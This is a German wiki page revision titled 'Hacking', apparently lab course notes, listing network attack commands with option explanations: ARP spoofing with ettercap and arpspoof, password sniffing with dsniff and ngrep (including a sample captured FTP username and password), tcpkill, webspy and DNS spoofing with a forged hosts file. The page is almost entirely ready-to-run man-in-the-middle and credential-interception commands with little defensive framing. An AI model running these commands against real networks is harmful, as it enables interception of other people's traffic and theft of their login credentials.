Hacking: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=ettercap= http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/“)
 
Zeile 1: Zeile 1:
 
=ettercap=
 
=ettercap=
 
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
 
http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/
 +
 +
=dsniff=
 +
== Ettercap ==
 +
'''Installation unter Ubuntu oder Debian'''
 +
apt-get install ettercap
 +
'''Arpspoofig mit Ettercap'''
 +
ettercap -T -q -M ARP /192.168.254.7/ //
 +
 +
'''optionen'''
 +
-T                =  Textmodus
 +
-q                =  still
 +
-M ARP            =  ARP Spoofing
 +
/192.168.254.7/    =  Der "infizierte" Host
 +
//                =  kompletes Netz wird gefaked
 +
 +
== Dsniff Tools ==
 +
'''Installation unter Ubuntu oder Debian'''
 +
apt-get install dsniff
 +
'''Passwörter spionieren mit dsniff - Beispiele'''
 +
==Dsniff==
 +
'''sniffen'''
 +
dsniff -n -i eth1 -s 1500 host  85.10.194.199 -w geheim.dat
 +
 +
'''auswerten'''
 +
dsniff -r geheim.dat
 +
-----------------
 +
02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp)
 +
USER wuschel
 +
PASS suxa
 +
 +
'''optionen'''
 +
-n                  =  numerische Ausgabe                 
 +
-i eth1            =  Schnittstelle 
 +
-s 1500            =  Länge des Mitschnittes pro Paket
 +
-w geheim.dat      =  schreibe in die Datei 
 +
host 85.10.194.199  =  Muster wie bei tcpdump
 +
-r geheim.dat      =  lese aus der Datei
 +
 +
==Tcpkill==
 +
tcpkill port 80
 +
 +
'''optionen'''
 +
port 80            =  Muster wie bei tcpdump
 +
 +
==Arpspoof==
 +
arpspoof -t 192.168.254.7 192.168.254.5
 +
 +
'''optionen'''
 +
-t 192.168.254.7  = Angriffszeil
 +
192.168.254.5      = Mac Adresse wird mit lokaler MacAdresse vertauscht
 +
 +
==Webspy==
 +
mozilla&
 +
webspy 192.168.254.22 
 +
 +
==Dnsspoof==
 +
'''Der Nameserver muss umgeleitet werden'''
 +
ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/
 +
 +
'''hosts anlegen'''
 +
192.168.254.4    www.xinux.de
 +
 +
'''dnsspoofen'''
 +
dnsspoof -f hosts
 +
 +
== Ngrep ==
 +
'''Installation unter Ubuntu oder Debian'''
 +
apt-get install ngrep
 +
'''Passwörter spionieren mit ngrep - Beispiele'''
 +
'''sniffen'''
 +
ngrep -d eth1 -s 1500 -l -i 'PASS|USER'  port 21
 +
 +
'''optionen'''
 +
-d eth1            =  Schnittstelle
 +
-s 1500            =  Länge des Mitschnittes pro Paket
 +
-l                =  Ausgabe wird zeilenweise gepuffert
 +
-i                =  Ignoriere Gross und Kleinschreibung 
 +
'PASS|USER'        =  Suchmuster in den Daten PASS oder USER
 +
port 21            =  Muster wie bei tcpdump

Version vom 6. August 2014, 07:14 Uhr

ettercap

http://www.tech-juice.org/2011/06/20/man-in-the-middle-attacks-with-ettercap/

dsniff

Ettercap

Installation unter Ubuntu oder Debian

apt-get install ettercap
Arpspoofig mit Ettercap
ettercap -T -q -M ARP /192.168.254.7/ //

optionen
-T                 =   Textmodus
-q                 =   still 
-M ARP             =   ARP Spoofing
/192.168.254.7/    =   Der "infizierte" Host
//                 =   kompletes Netz wird gefaked

Dsniff Tools

Installation unter Ubuntu oder Debian

apt-get install dsniff

Passwörter spionieren mit dsniff - Beispiele

Dsniff

sniffen
dsniff -n -i eth1 -s 1500 host  85.10.194.199 -w geheim.dat

auswerten
dsniff -r geheim.dat 
-----------------
02/06/07 18:51:34 tcp sagittarion.alpha.quadrant.46200 -> neelix.talaxia.de.21 (ftp)
USER wuschel
PASS suxa

optionen
-n                  =  numerische Ausgabe                   
-i eth1             =  Schnittstelle  
-s 1500             =  Länge des Mitschnittes pro Paket
-w geheim.dat       =  schreibe in die Datei  
host 85.10.194.199  =  Muster wie bei tcpdump
-r geheim.dat       =  lese aus der Datei

Tcpkill

tcpkill port 80

optionen
port 80            =  Muster wie bei tcpdump

Arpspoof

arpspoof -t 192.168.254.7 192.168.254.5

optionen
-t 192.168.254.7   = Angriffszeil
192.168.254.5      = Mac Adresse wird mit lokaler MacAdresse vertauscht

Webspy

mozilla&
webspy 192.168.254.22  

Dnsspoof

Der Nameserver muss umgeleitet werden 
ettercap -T -q -M ARP /192.168.254.22/ /192.168.254.4/

hosts anlegen
192.168.254.4    www.xinux.de

dnsspoofen
dnsspoof -f hosts

Ngrep

Installation unter Ubuntu oder Debian

apt-get install ngrep

Passwörter spionieren mit ngrep - Beispiele

sniffen
ngrep -d eth1 -s 1500 -l -i 'PASS|USER'  port 21
optionen
-d eth1            =   Schnittstelle
-s 1500            =  Länge des Mitschnittes pro Paket
-l                 =  Ausgabe wird zeilenweise gepuffert 
-i                 =  Ignoriere Gross und Kleinschreibung  
'PASS|USER'        =  Suchmuster in den Daten PASS oder USER
port 21            =  Muster wie bei tcpdump